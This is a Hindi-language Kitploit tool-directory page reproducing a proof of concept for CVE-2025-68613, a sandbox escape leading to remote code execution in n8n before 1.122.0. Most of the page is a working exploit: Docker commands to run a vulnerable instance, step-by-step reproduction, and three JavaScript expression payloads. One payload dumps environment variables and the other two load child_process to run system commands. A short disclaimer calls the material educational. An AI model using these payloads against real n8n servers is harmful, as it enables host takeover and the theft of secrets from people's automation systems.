Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
poc_CVE-2025-68613 — CVE-2025-68613 के लिए PoC | Kitploit
उपकरण/GitHubGitHub/reem-012/poc_cve-2025-68613
भेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubreem-012/poc_cve-2025-68613

poc_CVE-2025-68613

CVE-2025-68613 के लिए PoC

रिपॉजिटरी देखें
8 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

PoC: n8n सैंडबॉक्स एस्केप (CVE-2025-68613)

केवल शैक्षणिक उद्देश्यों के लिए यह प्रूफ ऑफ कॉन्सेप्ट n8n में एक गंभीर भेद्यता (CVE-2025-68613) को प्रदर्शित करता है। इसका उपयोग उन सिस्टमों पर न करें जिनके स्वामी आप नहीं हैं या जिनके परीक्षण के लिए आपके पास स्पष्ट अनुमति नहीं है।

भेद्यता अवलोकन

1.122.0 से पहले के n8n संस्करणों में रिमोट कोड एक्ज़ीक्यूशन (RCE) भेद्यता मौजूद है। प्रमाणित उपयोगकर्ता वर्कफ़्लो एक्सप्रेशन एडिटर में विशिष्ट JavaScript पेलोड के माध्यम से एक्सप्रेशन सैंडबॉक्स को बायपास कर सकते हैं और होस्ट सिस्टम पर मनमाना कोड निष्पादित कर सकते हैं।

1. भेद्य वातावरण सेटअप करें

एक डेटा वॉल्यूम बनाएं और n8n का एक भेद्य संस्करण (जैसे, v1.120.0) चलाएं।

root@kitploit:~
# Create volume for persistence
docker volume create n8n_data

# Run vulnerable n8n instance
docker run -it --rm \
  --name n8n \
  -p 5678:5678 \
  -v n8n_data:/home/node/.n8n \
  n8nio/n8n:1.120.0

2. पुनरुत्पादन चरण

इंटरफ़ेस तक पहुंचें

http://localhost:5678 पर जाएं और यदि आवश्यक हो तो प्रारंभिक सेटअप पूरा करें।

वर्कफ़्लो बनाएं

एक खाली वर्कफ़्लो शुरू करने के लिए "Add Workflow" पर क्लिक करें।

एक भेद्य नोड जोड़ें

वर्कफ़्लो में एक Set नोड जोड़ें। यह नोड हमें ऐसे मान परिभाषित करने की अनुमति देता है जिन्हें एक्सप्रेशन के रूप में मूल्यांकित किया जा सकता है।

एक्सप्रेशन कॉन्फ़िगर करें

Set नोड में, एक पैरामीटर (जैसे, value) संशोधित करें और इनपुट प्रकार को Expression में बदलें।

3. शोषण पेलोड

भेद्यता प्रदर्शित करने के लिए एक्सप्रेशन एडिटर में निम्नलिखित पेलोड दर्ज करें।

पेलोड 1: एनवायरनमेंट वेरिएबल डंप

यह पेलोड कंटेनर से संवेदनशील एनवायरनमेंट वेरिएबल लीक करने के लिए this.process.env तक पहुंचता है।

पेलोड:

root@kitploit:~
{{ (function() {
  return JSON.stringify(this.process.env, null, 2);
})() }}

परिणाम:

पेलोड 2: रिमोट कोड एक्ज़ीक्यूशन (whoami)

यह पेलोड child_process मॉड्यूल को लोड करने के लिए process.mainModule.require तक पहुंचकर सैंडबॉक्स को बायपास करता है, जिससे मनमाने सिस्टम कमांड निष्पादित किए जा सकते हैं।

पेलोड:

root@kitploit:~
{{ (function() {
  const require = this.process.mainModule.require;
  const { execSync } = require('child_process');
  return execSync('whoami').toString();
})() }}

परिणाम: चल रही प्रक्रिया के उपयोगकर्ता संदर्भ की पुष्टि करता है।

पेलोड 3: पूर्ण RCE (रूट डायरेक्टरी सूचीबद्ध करें)

फ़ाइल सिस्टम ब्राउज़ करने की क्षमता प्रदर्शित करता है।

पेलोड:

root@kitploit:~
{{ (function() {
  const require = this.process.mainModule.require;
  const { execSync } = require('child_process');
  return execSync('ls -la /').toString();
})() }}

परिणाम:

टूल डाउनलोड करें